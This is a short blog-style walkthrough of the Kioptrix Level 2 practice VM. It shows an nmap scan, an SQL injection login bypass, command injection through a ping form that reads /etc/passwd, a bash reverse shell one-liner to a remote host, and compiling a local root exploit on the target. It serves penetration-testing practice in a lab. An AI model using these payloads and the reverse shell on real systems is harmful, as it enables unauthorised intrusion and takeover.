Kioptrix level 2
Lets Start with Nmap
Command used : nmap -sC -sV 192.168.78.140
We’ve got a number of ports open.
I started with openssh 3.9p1, searched for an exploit on
exploit-db but couldn’t found a version specific.
Moving on to port 80 ,The WebServer. We are greeted by the
following screen.
A login page, lets do a bruteforce on it in the background
and try basic sql injection on the authorization system.
Upon giving username as test and Password as test’or 1=1#-- -
We got in.
What do we have here… a program to run ping command. But ping
command is a system command. Lets try if it can run multiple system commands
with ;
YES , we execute the following commands for system
enumeration for a shell.
Whoami;hostname;cat /etc/passwd
Which nc
Which python
The results told us there is no netcat on the machine, but
we have bash and python on the machine. We can use both to get a shell.
Let’s consult the pentest monkey reverse shell guide.
what should we do when there is no netcat, use bash.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
listen for the incoming shell on attacker machine and we popped
a shell.
Time for Privilege escalation journey.
I searched for kernel exploits, tried a few but it failed,
because requirements of the exploits were not met.
Then I searched for CENTOS 4.5 and found 2 exploits for priv
esc, exactly what we need.
Using the first one.
Searchsploit -m exploits/linux_x86/local/9542.c
Download it on attacker machine, transfer it to the victim
machine… wget is there to help us.
Compile the exploit on target machine since we have GCC
compiler installed there.
gcc 9542.c -o 9542
Give executable permissions to the compiled binary.
chmod +x 9542
and Execute it.
./9542
BINGO!!!
We are root
574r570rm
No comments:
Post a Comment